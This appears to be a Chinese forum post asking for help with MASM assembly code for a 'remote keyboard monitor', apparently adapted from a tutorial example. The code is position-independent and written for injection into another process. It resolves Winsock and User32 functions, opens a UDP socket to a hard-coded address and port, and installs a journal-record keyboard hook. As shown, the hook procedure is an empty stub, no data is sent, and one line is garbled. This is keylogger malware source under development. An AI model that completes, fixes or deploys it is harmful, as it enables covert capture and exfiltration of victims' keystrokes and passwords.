根据老罗的例子写一个远程键盘监控,请大家帮我分析一下问题
;--------------------------------------------------------------------
; Data area of the block that is copied into another process as one
; unit (REMOTE_CODE_START..REMOTE_CODE_END, size REMOTE_CODE_LENGTH).
; Nothing in it is addressed absolutely: _RemoteThread and _WinMain
; locate themselves with call/pop and reach every item as [ebx + item].
; NOTE(review): the first three _lp* slots are never written in this
; listing; presumably the injector fills them before the thread runs.
;--------------------------------------------------------------------
REMOTE_CODE_START equ this byte
_lpLoadLibrary dd ? ;imported-function address table (not filled by visible code)
_lpGetProcAddress dd ?
_lpGetModuleHandle dd ?
hsocket dd ? ;socket handle written by _WinMain
szip db '127.0.0.1',0 ;peer address string, passed to inet_addr in _WinMain
stSin sockaddr_in <?> ;peer sockaddr, filled in _WinMain (family, port, addr)
hook dd ? ;value returned by SetWindowsHookEx in _WinMain
; Ws2_32 entry points. _RemoteThread stores the resolved addresses into
; consecutive dwords starting at _lpWSAStartup, so this order must match
; the _szWSAStartup.._szsendto name list below.
_lpWSAStartup dd ?
_lpsocket dd ?
_lphtons dd ?
_lpinet_addr dd ?
_lpsendto dd ?
; User32 entry points; same rule, order matches _szSetWindowsHookEx.._szToAscii.
_lpSetWindowsHookEX dd ?
_lpCallNextHookEx dd ?
_lpGetKeyboardState dd ?
_lpGetKeyState dd ?
_lpToAscii dd ?
_hInstance dd ? ;result of GetModuleHandle(NULL) in the hosting process
;_hWinMain dd ?
;_szClassName db 'RemoteClass',0
;_szCaptionMain db 'RemoteWindow',0
; Name lists walked by _RemoteThread: NUL-separated names, each list
; terminated by a double NUL (the ",0,0" on its last entry).
_szWs2_32 db 'Ws2_32.dll',0
_szWSAStartup db 'WSAStartup',0
_szsocket db 'socket',0
_szhtons db 'htons',0
_szinet_addr db 'inet_addr',0
_szsendto db 'sendto',0,0 ;double NUL ends the Ws2_32 name list
_szDllUser db 'User32.dll',0
_szSetWindowsHookEx db 'SetWindowsHookEx',0
_szCallNextHookEx db 'CallNextHookEx',0
_szGetKeyboardState db 'GetKeyboardState',0
_szGetKeyState db 'GetKeyState',0
_szToAscii db 'ToAscii',0,0 ;the two NULs here are what the lookup loop tests for end-of-list
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------
; _RemoteThread(lParam)
; Entry routine of the relocated block (the injector that starts it is
; not part of this listing). lParam is not referenced.
; Steps: locate itself via call/pop, record the host module handle,
; resolve the User32 and then the Ws2_32 entry points into the _lp*
; tables by walking the NUL-separated name lists, then call _WinMain.
; Register roles: ebx = relocation delta, esi = current name,
; edi = next _lp* slot (all three restored by the 'uses' list).
; Return value: whatever eax holds after _WinMain; not set explicitly.
; _invoke is a macro defined outside this listing; assumed to push the
; arguments and call through the given memory operand -- confirm.
;--------------------------------------------------------------------
_RemoteThread proc uses ebx edi esi lParam
local @hModule
call @F
@@:
pop ebx
sub ebx,offset @B ;ebx = actual address - assembled address (relocation delta for self-addressing)
;********************************************************************
;GetModuleHandle(NULL) returns the module handle of the process this code now runs in
_invoke [ebx + _lpGetModuleHandle],NULL
mov [ebx + _hInstance],eax
lea eax,[ebx + offset _szDllUser]
;get the handle of user32.dll
_invoke [ebx + _lpGetModuleHandle],eax
mov @hModule,eax
lea esi,[ebx + offset _szSetWindowsHookEx]
lea edi,[ebx + offset _lpSetWindowsHookEX]
;resolve a group of entry points in a loop: one name -> one dword slot, in list order
.while TRUE
_invoke [ebx + _lpGetProcAddress],@hModule,esi
mov [edi],eax
add edi,4
@@:
lodsb ;al = [esi], esi += 1: advance to the byte after the current one
or al,al
jnz @B ;non-zero: the name is not finished yet, keep scanning
.break .if ! byte ptr [esi] ;two consecutive NULs: end of the list, stop
.endw
lea eax,[ebx + offset _szWs2_32]
;get the handle of Ws2_32.dll (same pattern as above for User32)
_invoke [ebx + _lpGetModuleHandle],eax
mov @hModule,eax
lea esi,[ebx + offset _szWSAStartup]
lea edi,[ebx + offset _lpWSAStartup]
;resolve the Ws2_32 entry points the same way, into _lpWSAStartup.._lpsendto
.while TRUE
_invoke [ebx + _lpGetProcAddress],@hModule,esi
mov [edi],eax
add edi,4
@@:
lodsb ;al = [esi], esi += 1
or al,al
jnz @B ;non-zero: name not finished
.break .if ! byte ptr [esi] ;double NUL: end of list
.endw
;********************************************************************
call _WinMain ;relative call, so it needs no relocation
ret
_RemoteThread endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ZeroMemory proc _lpDest,_dwSize
;--------------------------------------------------------------------
; _ZeroMemory(_lpDest, _dwSize)
; Fills _dwSize bytes at _lpDest with zero: whole dwords first, then
; the 0..3 remaining bytes. A size of 0 writes nothing.
; Preserves edi; clobbers eax, ecx and flags (DF is cleared).
;--------------------------------------------------------------------
push edi
mov edi,_lpDest
xor eax,eax
cld
mov ecx,_dwSize
push ecx
shr ecx,2 ;number of whole dwords
rep stosd
pop ecx
and ecx,3 ;trailing bytes
rep stosb
pop edi
ret
_ZeroMemory endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------
; HookProc(_dwCode, _wParam, _lParam)
; Callback whose address _WinMain passes to SetWindowsHookEx.
; As written it is a stub: both locals are declared but never used and
; the proc returns immediately with whatever eax holds on entry.
;--------------------------------------------------------------------
HookProc proc _dwCode,_wParam,_lParam
local @szKeyState[256]:byte
local szAscii[32]:byte
ret
HookProc endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------
; _WinMain()
; Called from _RemoteThread. Re-derives the relocation delta in ebx,
; initialises Winsock, creates a socket, fills stSin with the address
; in szip and port 270eh, and installs HookProc with SetWindowsHookEx.
; Register roles: ebx = relocation delta, esi = &stSin (relocated).
; The closing ret is commented out, so the proc ends without one.
;--------------------------------------------------------------------
_WinMain proc uses ebx esi edi
local @stWsa:WSADATA
;local @stFdSet:fd_set,@stTimeval:timeval
call @F
@@:
pop ebx
sub ebx,offset @B ;ebx = relocation delta, same trick as _RemoteThread
;********************************************************************
; create the socket
;********************************************************************
lea eax,@stWsa
_invoke [ebx+_lpWSAStartup],101h,eax ;101h = Winsock version 1.1
;NOTE(review): the next line holds two statements (_invoke ... and mov [ebx+hsocket],eax)
;collapsed onto one line, apparently by the paste; it does not assemble as shown
_invoke [ebx+_lpsocket],AF_INET,SOCK_DGRAM,0 mov [ebx+hsocket],eax
lea esi, stSin
add esi,ebx ;esi = relocated address of stSin
assume esi :ptr sockaddr_in
_invoke [ebx+_lphtons],270eh ;270eh = 9998, the port number ??????
mov [esi].sin_port,ax
mov [esi].sin_family,AF_INET
lea eax,[ebx+offset szip]
_invoke [ebx+_lpinet_addr],eax
mov [esi].sin_addr,eax
mov eax,[ebx + _hInstance] ;module handle recorded by _RemoteThread
lea edx,[ebx+offset HookProc] ;relocated address of the callback
_invoke [ebx+_lpSetWindowsHookEX],WH_JOURNALRECORD,edx,eax,NULL ;there is a problem with this line, but I do not know how to analyse it
mov [ebx+hook],eax
;ret
_WinMain endp
; End marker of the relocatable block; REMOTE_CODE_LENGTH is the byte
; count an injector copies (REMOTE_CODE_START..REMOTE_CODE_END).
REMOTE_CODE_END equ this byte
REMOTE_CODE_LENGTH equ offset REMOTE_CODE_END - offset REMOTE_CODE_START
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>